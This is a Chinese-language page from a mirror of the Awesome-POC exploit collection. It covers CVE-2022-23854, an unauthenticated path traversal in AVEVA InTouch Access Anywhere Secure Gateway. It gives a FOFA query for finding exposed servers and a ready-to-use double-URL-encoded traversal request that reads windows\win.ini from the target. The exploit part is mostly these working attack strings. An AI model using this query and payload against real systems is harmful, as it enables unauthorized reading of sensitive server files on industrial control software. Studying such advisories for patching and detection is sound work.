admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

722 B
Raw Blame History

AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854

漏洞描述

AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞未授权的攻击者可利用该漏洞获取服务器敏感信息。

漏洞影响

AVEVA InTouch安全网关

FOFA

body="InTouch Access Anywhere"

漏洞复现

登录页面

image-20221017170909794

验证POC

/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini

image-20221017170935596